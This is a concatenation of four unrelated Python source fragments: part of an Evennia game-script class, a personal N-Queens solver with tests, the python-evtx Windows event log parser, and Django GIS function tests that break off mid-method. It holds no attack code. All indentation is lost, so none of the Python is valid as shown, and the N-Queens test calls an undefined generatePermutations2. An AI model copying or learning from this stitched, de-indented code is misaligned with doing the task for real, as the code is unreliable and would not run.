# we must not crash inside the errback, even if db_obj is None.
pass
logger.log_err(estring)
def _step_callback(self):
"""
Step task runner. No try..except needed due to defer wrap.
"""
if not self.is_valid():
self.stop()
return
# call hook
self.at_repeat()
# check repeats
callcount = self.ndb._task.callcount
maxcount = self.db_repeats
if maxcount > 0 and maxcount <= callcount:
self.stop()
def _step_task(self):
"""
Step task. This groups error handling.
"""
try:
return maybeDeferred(self._step_callback).addErrback(self._step_errback)
except Exception:
logger.log_trace()
return None
# Public methods
def time_until_next_repeat(self):
"""
Get time until the script fires it `at_repeat` hook again.
Returns:
next (int): Time in seconds until the script runs again.
If not a timed script, return `None`.
Notes:
This hook is not used in any way by the script's stepping
system; it's only here for the user to be able to check in
on their scripts and when they will next be run.
"""
task = self.ndb._task
if task:
try:
return int(round(task.next_call_time()))
except TypeError:
pass
return None
def remaining_repeats(self):
"""
Get the number of returning repeats for limited Scripts.
Returns:
remaining (int or `None`): The number of repeats
remaining until the Script stops. Returns `None`
if it has unlimited repeats.
"""
task = self.ndb._task
if task:
return max(0, self.db_repeats - task.callcount)
return None
def start(self, force_restart=False):
"""
Called every time the script is started (for persistent
scripts, this is usually once every server start)
Args:
force_restart (bool, optional): Normally an already
started script will not be started again. if
`force_restart=True`, the script will always restart
the script, regardless of if it has started before.
Returns:
result (int): 0 or 1 depending on if the script successfully
started or not. Used in counting.
"""
if self.is_active and not force_restart:
# script already runs and should not be restarted.
return 0
obj = self.obj
if obj:
# check so the scripted object is valid and initalized
try:
obj.cmdset
except AttributeError:
# this means the object is not initialized.
logger.log_trace()
self.is_active = False
return 0
# try to restart a paused script
try:
if self.unpause(manual_unpause=False):
return 1
except RuntimeError:
# manually paused.
return 0
# start the script from scratch
self.is_active = True
try:
self.at_start()
except Exception:
logger.log_trace()
if self.db_interval > 0:
self._start_task()
return 1
def stop(self, kill=False):
"""
Called to stop the script from running. This also deletes the
script.
Args:
kill (bool, optional): - Stop the script without
calling any relevant script hooks.
Returns:
result (int): 0 if the script failed to stop, 1 otherwise.
Used in counting.
"""
if not kill:
try:
self.at_stop()
except Exception:
logger.log_trace()
self._stop_task()
try:
self.delete()
except AssertionError:
logger.log_trace()
return 0
except ObjectDoesNotExist:
return 0
return 1
def pause(self, manual_pause=True):
"""
This stops a running script and stores its active state.
It WILL NOT call the `at_stop()` hook.
"""
self.db._manual_pause = manual_pause
if not self.db._paused_time:
# only allow pause if not already paused
task = self.ndb._task
if task:
self.db._paused_time = task.next_call_time()
self.db._paused_callcount = task.callcount
self._stop_task()
self.is_active = False
def unpause(self, manual_unpause=True):
"""
Restart a paused script. This WILL call the `at_start()` hook.
Args:
manual_unpause (bool, optional): This is False if unpause is
called by the server reload/reset mechanism.
Returns:
result (bool): True if unpause was triggered, False otherwise.
Raises:
RuntimeError: If trying to automatically resart this script
(usually after a reset/reload), but it was manually paused,
and so should not the auto-unpaused.
"""
if not manual_unpause and self.db._manual_pause:
# if this script was paused manually (by a direct call of pause),
# it cannot be automatically unpaused (e.g. by a @reload)
raise RuntimeError
# Ensure that the script is fully unpaused, so that future calls
# to unpause do not raise a RuntimeError
self.db._manual_pause = False
if self.db._paused_time:
# only unpause if previously paused
self.is_active = True
try:
self.at_start()
except Exception:
logger.log_trace()
self._start_task()
return True
def restart(self, interval=None, repeats=None, start_delay=None):
"""
Restarts an already existing/running Script from the
beginning, optionally using different settings. This will
first call the stop hooks, and then the start hooks again.
Args:
interval (int, optional): Allows for changing the interval
of the Script. Given in seconds. if `None`, will use the
already stored interval.
repeats (int, optional): The number of repeats. If unset, will
use the previous setting.
start_delay (bool, optional): If we should wait `interval` seconds
before starting or not. If `None`, re-use the previous setting.
"""
try:
self.at_stop()
except Exception:
logger.log_trace()
self._stop_task()
self.is_active = False
# remove all pause flags
del self.db._paused_time
del self.db._manual_pause
del self.db._paused_callcount
# set new flags and start over
if interval is not None:
self.interval = interval
if repeats is not None:
self.repeats = repeats
if start_delay is not None:
self.start_delay = start_delay
self.start()
def reset_callcount(self, value=0):
"""
Reset the count of the number of calls done.
Args:
value (int, optional): The repeat value to reset to. Default
is to set it all the way back to 0.
Notes:
This is only useful if repeats != 0.
"""
task = self.ndb._task
if task:
task.callcount = max(0, int(value))
def force_repeat(self):
"""
Fire a premature triggering of the script callback. This
will reset the timer and count down repeats as if the script
had fired normally.
"""
task = self.ndb._task
if task:
task.force_repeat()
def at_first_save(self, **kwargs):
"""
This is called after very first time this object is saved.
Generally, you don't need to overload this, but only the hooks
called by this method.
Args:
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
self.at_script_creation()
if hasattr(self, "_createdict"):
# this will only be set if the utils.create_script
# function was used to create the object. We want
# the create call's kwargs to override the values
# set by hooks.
cdict = self._createdict
updates = []
if not cdict.get("key"):
if not self.db_key:
self.db_key = "#%i" % self.dbid
updates.append("db_key")
elif self.db_key != cdict["key"]:
self.db_key = cdict["key"]
updates.append("db_key")
if cdict.get("interval") and self.interval != cdict["interval"]:
self.db_interval = cdict["interval"]
updates.append("db_interval")
if cdict.get("start_delay") and self.start_delay != cdict["start_delay"]:
self.db_start_delay = cdict["start_delay"]
updates.append("db_start_delay")
if cdict.get("repeats") and self.repeats != cdict["repeats"]:
self.db_repeats = cdict["repeats"]
updates.append("db_repeats")
if cdict.get("persistent") and self.persistent != cdict["persistent"]:
self.db_persistent = cdict["persistent"]
updates.append("db_persistent")
if updates:
self.save(update_fields=updates)
if not cdict.get("autostart"):
# don't auto-start the script
return
# auto-start script (default)
self.start()
def at_script_creation(self):
"""
Only called once, by the create function.
"""
pass
def is_valid(self):
"""
Is called to check if the script is valid to run at this time.
Should return a boolean. The method is assumed to collect all
needed information from its related self.obj.
"""
return not self._is_deleted
def at_start(self, **kwargs):
"""
Called whenever the script is started, which for persistent
scripts is at least once every server start. It will also be
called when starting again after a pause (such as after a
server reload)
Args:
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
pass
def at_repeat(self, **kwargs):
"""
Called repeatedly if this Script is set to repeat regularly.
Args:
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
pass
def at_stop(self, **kwargs):
"""
Called whenever when it's time for this script to stop (either
because is_valid returned False or it runs out of iterations)
Args
**kwargs (dict): Arbitrary, optional arguments for users
overriding the call (unused by default).
"""
pass
def at_server_reload(self):
"""
This hook is called whenever the server is shutting down for
restart/reboot. If you want to, for example, save
non-persistent properties across a restart, this is the place
to do it.
"""
pass
def at_server_shutdown(self):
"""
This hook is called whenever the server is shutting down fully
(i.e. not for a restart).
"""
pass
# Some useful default Script types used by Evennia.
class DoNothing(DefaultScript):
"""
A script that does nothing. Used as default fallback.
"""
def at_script_creation(self):
"""
Setup the script
"""
self.key = "sys_do_nothing"
self.desc = "This is an empty placeholder script."
class Store(DefaultScript):
"""
Simple storage script
"""
def at_script_creation(self):
"""
Setup the script
"""
self.key = "sys_storage"
self.desc = "This is a generic storage container."
| |
'''
1. brute force: check every single combo of placements, 64C8 (4 bil)
2. brute force: constrain each queen to a column, 8^8 (16 mil)
3. permutations: constrain each queen to a column and row, 8! (40 k)
4. backtracking, from brute force: (15 k)
5. backtracking, with permutations (5 k)
# TODO
# 2. backtracking all n^2Cn
# 3. combo of permutation plus backtracking
# from leetcode
# https://leetcode.com/problems/n-queens-ii/discuss/20147/Python-recursive-dfs-solution.
def v1(n):
return dfs1([0]*n, 0, 0)
def dfs1(nums, index, total):
#print(nums, index, total)
if index == len(nums):
return total + 1
count = 0
for i in range(len(nums)):
nums[index] = i
if valid(nums, index):
count += dfs1(nums, index+1, total)
return total + count
def valid(nums, n):
#print(nums, n)
for i in range(n):
if nums[i] == nums[n] or abs(nums[n]-nums[i]) == n-i:
return False
return True
# https://leetcode.com/problems/n-queens-ii/discuss/20090/11-line-Python-solution-easy-to-understand
def v2(n):
sets = set(range(n))
return dfs(sets, ['.'] * n, 0, n)
def dfs(sets, board, row, n):
if row == n:
return 1
count = 0
for x in sets - set(board):
# check diagonal conflict
if all(row - i != abs(x - y) for i, y in enumerate(board[:row])):
board[row] = x
count += dfs(sets, board, row + 1, n)
board[row] = '.'
return count
# https://leetcode.com/problems/n-queens-ii/discuss/20169/Accepted-backtracking-Python-solution.-Very-similar-to-the-solution-to-N-Queens-I.
def v3(self, n):
self.num = 0
self.board = [["." for x in range(n)] for x in range(n)]
self.n = n
self.solve(0)
return self.num
def solve(self, col):
if col == self.n:
self.num += 1
return
for row in range(self.n):
if self.isSafe(row, col):
self.board[row][col] = "Q"
self.solve(col+1)
self.board[row][col] = "."
def isSafe(self, row, col):
for c in range(col):
if self.board[row][c] == "Q":
return False
rup = row-1
rdown = row+1
c = col-1
while c >= 0:
if rup >= 0:
if self.board[rup][c] == "Q":
return False
if rdown < self.n:
if self.board[rdown][c] == "Q":
return False
rup -= 1
rdown += 1
c -= 1
return True
'''
# Generate n! perms and check which ones are valid
def v4(n):
# create permutations using sets
perms = generatePermutations(n)
return len([perm for perm in perms if isBoardValid(perm)])
def generatePermutations(n):
perms = [[]]
for num in range(n):
newPerms = []
for perm in perms:
for i in range(len(perm)+1):
newPerms.append(perm[:i] + [num] + perm[i:])
perms = newPerms
return perms
def v5(n):
results = []
nums = set(range(n))
helper5(results, nums, [])
return len(results)
def helper5(results, remaining, path):
if not remaining:
results.append(path)
return
for num in remaining:
if not isNewQueenValid(path, num):
continue
newPath = path.copy()
newPath.append(num)
newRemaining = remaining.copy()
newRemaining.remove(num)
helper5(results, newRemaining, newPath)
def isNewQueenValid(colRows, newRow):
newCol = len(colRows)
for prevCol in range(newCol):
prevRow = colRows[prevCol]
# only check diag, dont have to check same col or row
if (prevCol + prevRow) == (newCol + newRow):
return False
if (prevCol - prevRow) == (newCol - newRow):
return False
return True
def isBoardValid(cols):
for currCol in range(1, len(cols)):
currRow = cols[currCol]
for prevCol in range(currCol):
prevRow = cols[prevCol]
# only check diag, dont have to check same col or row
if (currCol + currRow) == (prevCol + prevRow):
return False
if (currCol - currRow) == (prevCol - prevRow):
return False
return True
def isEndValid(cols):
currCol = len(cols)-1
currRow = cols[currCol]
for prevCol in range(currCol):
prevRow = cols[prevCol]
# only check diag, dont have to check same col or row
if (currCol + currRow) == (prevCol + prevRow):
return False
if (currCol - currRow) == (prevCol - prevRow):
return False
return True
import testSuite
def main():
#testIsValid()
#testIsValidNewQueen()
#testPermutation()
testMain()
def testMain():
tests = [
#[[1], 1],
#[[2], 0],
#[[3], 0],
[[4], 2],
[[5], 10],
[[6], 4],
[[7], 40],
[[8], 92],
#[[9], 352],
#[[10], 724],
]
t = testSuite.init(tests)
#t.test(v1)
#t.test(v2)
t.test(v4)
t.test(v5)
def testIsValid():
tests = [
[[[3,2,1,0]], False],
[[[3,2,0,1]], False],
[[[1,2,3,0]], False],
[[[0,1,2,3]], False],
# valid (very few)
[[[1,3,0,2]], True],
[[[2,0,3,1]], True],
# partial
[[[3,2]], False],
[[[2,0]], True],
]
t = testSuite.init(tests)
t.test(isEndValid)
t.test(isBoardValid)
def testIsValidNewQueen():
tests = [
[[[3,2,1],0], False],
[[[3,2,0],1], False],
[[[1,2,3],0], False],
[[[0,1,2],3], False],
# valid (very few)
[[[1,3,0],2], True],
[[[2,0,3],1], True],
# partial
[[[3],2], False],
[[[2],0], True],
]
t = testSuite.init(tests)
t.test(isNewQueenValid)
def testPermutation():
#p = generatePermutations(3)
p = generatePermutations2(4)
print(p)
main()
| |
#!/usr/bin/python
# This file is part of python-evtx.
#
# Copyright 2012, 2013 Willi Ballenthin <william.ballenthin@mandiant.com>
# while at Mandiant <http://www.mandiant.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Version v.0.3.0
import re
import binascii
import mmap
from functools import wraps
from BinaryParser import ParseException
from BinaryParser import Block
from BinaryParser import debug
from BinaryParser import warning
from Nodes import NameStringNode
from Nodes import TemplateNode
from Nodes import RootNode
class InvalidRecordException(ParseException):
def __init__(self):
super(InvalidRecordException, self).__init__(
"Invalid record structure")
class Evtx(object):
"""
A convenience class that makes it easy to open an
EVTX file and start iterating the important structures.
Note, this class must be used in a context statement
(see the `with` keyword).
Note, this class will mmap the target file, so ensure
your platform supports this operation.
"""
def __init__(self, filename):
"""
@type filename: str
@param filename: A string that contains the path
to the EVTX file to open.
"""
self._filename = filename
self._buf = None
self._f = None
self._fh = None
def __enter__(self):
self._f = open(self._filename, "rb")
self._buf = mmap.mmap(self._f.fileno(), 0, access=mmap.ACCESS_READ)
self._fh = FileHeader(self._buf, 0x0)
return self
def __exit__(self, type, value, traceback):
self._buf.close()
self._f.close()
self._fh = None
def ensure_contexted(func):
"""
This decorator ensure that an instance of the
Evtx class is used within a context statement. That is,
that the `with` statement is used, or `__enter__()`
and `__exit__()` are called explicitly.
"""
@wraps(func)
def wrapped(self, *args, **kwargs):
if self._buf is None:
raise TypeError("An Evtx object must be used with"
" a context (see the `with` statement).")
else:
return func(self, *args, **kwargs)
return wrapped
@ensure_contexted
def chunks(self):
"""
Get each of the ChunkHeaders from within this EVTX file.
@rtype generator of ChunkHeader
@return A generator of ChunkHeaders from this EVTX file.
"""
for chunk in self._fh.chunks():
yield chunk
@ensure_contexted
def records(self):
"""
Get each of the Records from within this EVTX file.
@rtype generator of Record
@return A generator of Records from this EVTX file.
"""
for chunk in self.chunks():
for record in chunk.records():
yield record
@ensure_contexted
def get_record(self, record_num):
"""
Get a Record by record number.
@type record_num: int
@param record_num: The record number of the the record to fetch.
@rtype Record or None
@return The record request by record number, or None if
the record is not found.
"""
return self._fh.get_record(record_num)
@ensure_contexted
def get_file_header(self):
return self._fh
class FileHeader(Block):
def __init__(self, buf, offset):
debug("FILE HEADER at %s." % (hex(offset)))
super(FileHeader, self).__init__(buf, offset)
self.declare_field("string", "magic", 0x0, length=8)
self.declare_field("qword", "oldest_chunk")
self.declare_field("qword", "current_chunk_number")
self.declare_field("qword", "next_record_number")
self.declare_field("dword", "header_size")
self.declare_field("word", "minor_version")
self.declare_field("word", "major_version")
self.declare_field("word", "header_chunk_size")
self.declare_field("word", "chunk_count")
self.declare_field("binary", "unused1", length=0x4c)
self.declare_field("dword", "flags")
self.declare_field("dword", "checksum")
def __repr__(self):
return "FileHeader(buf=%r, offset=%r)" % (self._buf, self._offset)
def __str__(self):
return "FileHeader(offset=%s)" % (hex(self._offset))
def check_magic(self):
"""
@return A boolean that indicates if the first eight bytes of
the FileHeader match the expected magic value.
"""
return self.magic() == "ElfFile\x00"
def calculate_checksum(self):
"""
@return A integer in the range of an unsigned int that
is the calculated CRC32 checksum off the first 0x78 bytes.
This is consistent with the checksum stored by the FileHeader.
"""
return binascii.crc32(self.unpack_binary(0, 0x78)) & 0xFFFFFFFF
def verify(self):
"""
@return A boolean that indicates that the FileHeader
successfully passes a set of heuristic checks that
all EVTX FileHeaders should pass.
"""
return self.check_magic() and \
self.major_version() == 0x3 and \
self.minor_version() == 0x1 and \
self.header_chunk_size() == 0x1000 and \
self.checksum() == self.calculate_checksum()
def is_dirty(self):
"""
@return A boolean that indicates that the log has been
opened and was changed, though not all changes might be
reflected in the file header.
"""
return self.flags() & 0x1 == 0x1
def is_full(self):
"""
@return A boolean that indicates that the log
has reached its maximum configured size and the retention
policy in effect does not allow to reclaim a suitable amount
of space from the oldest records and an event message could
not be written to the log file.
"""
return self.flags() & 0x2 == 0x2
def first_chunk(self):
"""
@return A ChunkHeader instance that is the first chunk
in the log file, which is always found directly after
the FileHeader.
"""
ofs = self._offset + self.header_chunk_size()
return ChunkHeader(self._buf, ofs)
def current_chunk(self):
"""
@return A ChunkHeader instance that is the current chunk
indicated by the FileHeader.
"""
ofs = self._offset + self.header_chunk_size()
ofs += (self.current_chunk_number() * 0x10000)
return ChunkHeader(self._buf, ofs)
def chunks(self):
"""
@return A generator that yields the chunks of the log file
starting with the first chunk, which is always found directly
after the FileHeader, and continuing to the end of the file.
"""
ofs = self._offset + self.header_chunk_size()
while ofs + 0x10000 <= len(self._buf):
yield ChunkHeader(self._buf, ofs)
ofs += 0x10000
def get_record(self, record_num):
"""
Get a Record by record number.
@type record_num: int
@param record_num: The record number of the the record to fetch.
@rtype Record or None
@return The record request by record number, or None if the
record is not found.
"""
for chunk in self.chunks():
first_record = chunk.log_first_record_number()
last_record = chunk.log_last_record_number()
if not (first_record <= record_num <= last_record):
continue
for record in chunk.records():
if record.record_num() == record_num:
return record
return None
class Template(object):
def __init__(self, template_node):
self._template_node = template_node
self._xml = None
def _load_xml(self):
"""
TODO(wb): One day, nodes should generate format strings
instead of the XML format made-up abomination.
"""
if self._xml is not None:
return
matcher = "\[(?:Normal|Conditional) Substitution\(index=(\d+), type=\d+\)\]"
self._xml = re.sub(matcher, "{\\1:}",
self._template_node.template_format().replace("{", "{{").replace("}", "}}"))
def make_substitutions(self, substitutions):
"""
@type substitutions: list of VariantTypeNode
"""
self._load_xml()
return self._xml.format(*map(lambda n: n.xml(), substitutions))
def node(self):
return self._template_node
class ChunkHeader(Block):
def __init__(self, buf, offset):
debug("CHUNK HEADER at %s." % (hex(offset)))
super(ChunkHeader, self).__init__(buf, offset)
self._strings = None
self._templates = None
self.declare_field("string", "magic", 0x0, length=8)
self.declare_field("qword", "file_first_record_number")
self.declare_field("qword", "file_last_record_number")
self.declare_field("qword", "log_first_record_number")
self.declare_field("qword", "log_last_record_number")
self.declare_field("dword", "header_size")
self.declare_field("dword", "last_record_offset")
self.declare_field("dword", "next_record_offset")
self.declare_field("dword", "data_checksum")
self.declare_field("binary", "unused", length=0x44)
self.declare_field("dword", "header_checksum")
def __repr__(self):
return "ChunkHeader(buf=%r, offset=%r)" % (self._buf, self._offset)
def __str__(self):
return "ChunkHeader(offset=%s)" % (hex(self._offset))
def check_magic(self):
"""
@return A boolean that indicates if the first eight bytes of
the ChunkHeader match the expected magic value.
"""
return self.magic() == "ElfChnk\x00"
def calculate_header_checksum(self):
"""
@return A integer in the range of an unsigned int that
is the calculated CRC32 checksum of the ChunkHeader fields.
"""
data = self.unpack_binary(0x0, 0x78)
data += self.unpack_binary(0x80, 0x180)
return binascii.crc32(data) & 0xFFFFFFFF
def calculate_data_checksum(self):
"""
@return A integer in the range of an unsigned int that
is the calculated CRC32 checksum of the Chunk data.
"""
data = self.unpack_binary(0x200, self.next_record_offset() - 0x200)
return binascii.crc32(data) & 0xFFFFFFFF
def verify(self):
"""
@return A boolean that indicates that the FileHeader
successfully passes a set of heuristic checks that
all EVTX ChunkHeaders should pass.
"""
return self.check_magic() and \
self.calculate_header_checksum() == self.header_checksum() and \
self.calculate_data_checksum() == self.data_checksum()
def _load_strings(self):
if self._strings is None:
self._strings = {}
for i in xrange(64):
ofs = self.unpack_dword(0x80 + (i * 4))
while ofs > 0:
string_node = self.add_string(ofs)
ofs = string_node.next_offset()
def strings(self):
"""
@return A dict(offset --> NameStringNode)
"""
if not self._strings:
self._load_strings()
return self._strings
def add_string(self, offset, parent=None):
"""
@param offset An integer offset that is relative to the start of
this chunk.
@param parent (Optional) The parent of the newly created
NameStringNode instance. (Default: this chunk).
@return None
"""
if self._strings is None:
self._load_strings()
string_node = NameStringNode(self._buf, self._offset + offset,
self, parent or self)
self._strings[offset] = string_node
return string_node
def _load_templates(self):
"""
@return None
"""
if self._templates is None:
self._templates = {}
for i in xrange(32):
ofs = self.unpack_dword(0x180 + (i * 4))
while ofs > 0:
# unclear why these are found before the offset
# this is a direct port from A.S.'s code
token = self.unpack_byte(ofs - 10)
pointer = self.unpack_dword(ofs - 4)
if token != 0x0c or pointer != ofs:
warning("Unexpected token encountered")
ofs = 0
continue
template = self.add_template(ofs)
ofs = template.next_offset()
def add_template(self, offset, parent=None):
"""
@param offset An integer which contains the chunk-relative offset
to a template to load into this Chunk.
@param parent (Optional) The parent of the newly created
TemplateNode instance. (Default: this chunk).
@return Newly added TemplateNode instance.
"""
if self._templates is None:
self._load_templates()
node = TemplateNode(self._buf, self._offset + offset,
self, parent or self)
self._templates[offset] = node
return node
def templates(self):
"""
@return A dict(offset --> Template) of all encountered
templates in this Chunk.
"""
if not self._templates:
self._load_templates()
return self._templates
def first_record(self):
return Record(self._buf, self._offset + 0x200, self)
def records(self):
record = self.first_record()
while record._offset < self._offset + self.next_record_offset():
yield record
try:
record = Record(self._buf,
record._offset + record.length(),
self)
except InvalidRecordException:
return
class Record(Block):
def __init__(self, buf, offset, chunk):
debug("Record at %s." % (hex(offset)))
super(Record, self).__init__(buf, offset)
self._chunk = chunk
self.declare_field("dword", "magic", 0x0) # 0x00002a2a
self.declare_field("dword", "size")
self.declare_field("qword", "record_num")
self.declare_field("filetime", "timestamp")
if self.size() > 0x10000:
raise InvalidRecordException()
self.declare_field("dword", "size2", self.size() - 4)
def __repr__(self):
return "Record(buf=%r, offset=%r)" % (self._buf, self._offset)
def __str__(self):
return "Record(offset=%s)" % (hex(self._offset))
def root(self):
return RootNode(self._buf, self._offset + 0x18, self._chunk, self)
def length(self):
return self.size()
def verify(self):
return self.size() == self.size2()
def data(self):
"""
Return the raw data block which makes up this record as a bytestring.
@rtype str
@return A string that is a copy of the buffer that makes
up this record.
"""
return self._buf[self.offset():self.offset() + self.size()]
| |
from __future__ import unicode_literals
import re
from decimal import Decimal
from django.contrib.gis.db.models import functions
from django.contrib.gis.geos import LineString, Point, Polygon, fromstr
from django.db import connection
from django.test import TestCase, skipUnlessDBFeature
from django.utils import six
from ..utils import mysql, oracle, postgis, spatialite
from .models import City, Country, State, Track
@skipUnlessDBFeature("gis_enabled")
class GISFunctionsTests(TestCase):
"""
Testing functions from django/contrib/gis/db/models/functions.py.
Several tests are taken and adapted from GeoQuerySetTest.
Area/Distance/Length/Perimeter are tested in distapp/tests.
Please keep the tests in function's alphabetic order.
"""
fixtures = ['initial']
def test_asgeojson(self):
# Only PostGIS and SpatiaLite support GeoJSON.
if not connection.ops.geojson:
with self.assertRaises(NotImplementedError):
list(Country.objects.annotate(json=functions.AsGeoJSON('mpoly')))
return
pueblo_json = '{"type":"Point","coordinates":[-104.609252,38.255001]}'
houston_json = (
'{"type":"Point","crs":{"type":"name","properties":'
'{"name":"EPSG:4326"}},"coordinates":[-95.363151,29.763374]}'
)
victoria_json = (
'{"type":"Point","bbox":[-123.30519600,48.46261100,-123.30519600,48.46261100],'
'"coordinates":[-123.305196,48.462611]}'
)
chicago_json = (
'{"type":"Point","crs":{"type":"name","properties":{"name":"EPSG:4326"}},'
'"bbox":[-87.65018,41.85039,-87.65018,41.85039],"coordinates":[-87.65018,41.85039]}'
)
if spatialite:
victoria_json = (
'{"type":"Point","bbox":[-123.305196,48.462611,-123.305196,48.462611],'
'"coordinates":[-123.305196,48.462611]}'
)
# Precision argument should only be an integer
with self.assertRaises(TypeError):
City.objects.annotate(geojson=functions.AsGeoJSON('point', precision='foo'))
# Reference queries and values.
# SELECT ST_AsGeoJson("geoapp_city"."point", 8, 0)
# FROM "geoapp_city" WHERE "geoapp_city"."name" = 'Pueblo';
self.assertEqual(
pueblo_json,
City.objects.annotate(geojson=functions.AsGeoJSON('point')).get(name='Pueblo').geojson
)
# SELECT ST_AsGeoJson("geoapp_city"."point", 8, 2) FROM "geoapp_city"
# WHERE "geoapp_city"."name" = 'Houston';
# This time we want to include the CRS by using the `crs` keyword.
self.assertEqual(
houston_json,
City.objects.annotate(json=functions.AsGeoJSON('point', crs=True)).get(name='Houston').json
)
# SELECT ST_AsGeoJson("geoapp_city"."point", 8, 1) FROM "geoapp_city"
# WHERE "geoapp_city"."name" = 'Houston';
# This time we include the bounding box by using the `bbox` keyword.
self.assertEqual(
victoria_json,
City.objects.annotate(
geojson=functions.AsGeoJSON('point', bbox=True)
).get(name='Victoria').geojson
)
# SELECT ST_AsGeoJson("geoapp_city"."point", 5, 3) FROM "geoapp_city"
# WHERE "geoapp_city"."name" = 'Chicago';
# Finally, we set every available keyword.
self.assertEqual(
chicago_json,
City.objects.annotate(
geojson=functions.AsGeoJSON('point', bbox=True, crs=True, precision=5)
).get(name='Chicago').geojson
)
@skipUnlessDBFeature("has_AsGML_function")
def test_asgml(self):
# Should throw a TypeError when tyring to obtain GML from a
# non-geometry field.
qs = City.objects.all()
with self.assertRaises(TypeError):
qs.annotate(gml=functions.AsGML('name'))
ptown = City.objects.annotate(gml=functions.AsGML('point', precision=9)).get(name='Pueblo')
if oracle:
# No precision parameter for Oracle :-/
gml_regex = re.compile(
r'^<gml:Point srsName="SDO:4326" xmlns:gml="http://www.opengis.net/gml">'
r'<gml:coordinates decimal="\." cs="," ts=" ">-104.60925\d+,38.25500\d+ '
r'</gml:coordinates></gml:Point>'
)
else:
gml_regex = re.compile(
r'^<gml:Point srsName="EPSG:4326"><gml:coordinates>'
r'-104\.60925\d+,38\.255001</gml:coordinates></gml:Point>'
)
self.assertTrue(gml_regex.match(ptown.gml))
if postgis:
self.assertIn(
'<gml:pos srsDimension="2">',
City.objects.annotate(gml=functions.AsGML('point', version=3)).get(name='Pueblo').gml
)
@skipUnlessDBFeature("has_AsKML_function")
def test_askml(self):
# Should throw a TypeError when trying to obtain KML from a
# non-geometry field.
with self.assertRaises(TypeError):
City.objects.annotate(kml=functions.AsKML('name'))
# Ensuring the KML is as expected.
ptown = City.objects.annotate(kml=functions.AsKML('point', precision=9)).get(name='Pueblo')
self.assertEqual('<Point><coordinates>-104.609252,38.255001</coordinates></Point>', ptown.kml)
@skipUnlessDBFeature("has_AsSVG_function")
def test_assvg(self):
with self.assertRaises(TypeError):
City.objects.annotate(svg=functions.AsSVG('point', precision='foo'))
# SELECT AsSVG(geoapp_city.point, 0, 8) FROM geoapp_city WHERE name = 'Pueblo';
svg1 = 'cx="-104.609252" cy="-38.255001"'
# Even though relative, only one point so it's practically the same except for
# the 'c' letter prefix on the x,y values.
svg2 = svg1.replace('c', '')
self.assertEqual(svg1, City.objects.annotate(svg=functions.AsSVG('point')).get(name='Pueblo').svg)
self.assertEqual(svg2, City.objects.annotate(svg=functions.AsSVG('point', relative=5)).get(name='Pueblo').svg)
@skipUnlessDBFeature("has_BoundingCircle_function")
def test_bounding_circle(self):
qs = Country.objects.annotate(circle=functions.BoundingCircle('mpoly')).order_by('name')
self.assertAlmostEqual(qs[0].circle.area, 168.89, 2)
self.assertAlmostEqual(qs[1].circle.area, 135.95, 2)
qs = Country.objects.annotate(circle=functions.BoundingCircle('mpoly', num_seg=12)).order_by('name')
self.assertAlmostEqual(qs[0].circle.area, 168.44, 2)
self.assertAlmostEqual(qs[1].circle.area, 135.59, 2)
@skipUnlessDBFeature("has_Centroid_function")
def test_centroid(self):
qs = State.objects.exclude(poly__isnull=True).annotate(centroid=functions.Centroid('poly'))
tol = 1.8 if mysql else (0.1 if oracle else 0.00001)
for state in qs:
self.assertTrue(state.poly.centroid.equals_exact(state.centroid, tol))
with self.assertRaisesMessage(TypeError, "'Centroid' takes exactly 1 argument (2 given)"):
State.objects.annotate(centroid=functions.Centroid('poly', 'poly'))
@skipUnlessDBFeature("has_Difference_function")
def test_difference(self):
geom = Point(5, 23, srid=4326)
qs = Country.objects.annotate(diff=functions.Difference('mpoly', geom))
# For some reason SpatiaLite does something screwy with the Texas geometry here.
if spatialite:
qs = qs.exclude(name='Texas')
for c in qs:
self.assertTrue(c.mpoly.difference(geom).equals(c.diff))
@skipUnlessDBFeature("has_Difference_function", "has_Transform_function")
def test_difference_mixed_srid(self):
"""Testing with mixed SRID (Country has default 4326)."""
geom = Point(556597.4, 2632018.6, srid=3857) # Spherical mercator
qs = Country.objects.annotate(difference=functions.Difference('mpoly', geom))
# For some reason SpatiaLite does something screwy with the Texas geometry here.
if spatialite:
qs = qs.exclude(name='Texas')
for c in qs:
self.assertTrue(c.mpoly.difference(geom).equals(c.difference))
@skipUnlessDBFeature("has_Envelope_function")
def test_envelope(self):
countries = Country.objects.annotate(envelope=functions.Envelope('mpoly'))
for country in countries:
self.assertIsInstance(country.envelope, Polygon)
@skipUnlessDBFeature("has_ForceRHR_function")
def test_force_rhr(self):
rings = (
((0, 0), (5, 0), (0, 5), (0, 0)),
((1, 1), (1, 3), (3, 1), (1, 1)),
)
rhr_rings = (
((0, 0), (0, 5), (5, 0), (0, 0)),
((1, 1), (3, 1), (1, 3), (1, 1)),
)
State.objects.create(name='Foo', poly=Polygon(*rings))
st = State.objects.annotate(force_rhr=functions.ForceRHR('poly')).get(name='Foo')
self.assertEqual(rhr_rings, st.force_rhr.coords)
@skipUnlessDBFeature("has_GeoHash_function")
def test_geohash(self):
# Reference query:
# SELECT ST_GeoHash(point) FROM geoapp_city WHERE name='Houston';
# SELECT ST_GeoHash(point, 5) FROM geoapp_city WHERE name='Houston';
ref_hash = '9vk1mfq8jx0c8e0386z6'
h1 = City.objects.annotate(geohash=functions.GeoHash('point')).get(name='Houston')
h2 = City.objects.annotate(geohash=functions.GeoHash('point', precision=5)).get(name='Houston')
self.assertEqual(ref_hash, h1.geohash)
self.assertEqual(ref_hash[:5], h2.geohash)
@skipUnlessDBFeature("has_Intersection_function")
def test_intersection(self):
geom = Point(5, 23, srid=4326)
qs = Country.objects.annotate(inter=functions.Intersection('mpoly', geom))
for c in qs:
if spatialite or mysql:
# When the intersection is empty, Spatialite and MySQL return None
expected = None
else:
expected = c.mpoly.intersection(geom)
self.assertEqual(c.inter, expected)
@skipUnlessDBFeature("has_MemSize_function")
def test_memsize(self):
ptown = City.objects.annotate(size=functions.MemSize('point')).get(name='Pueblo')
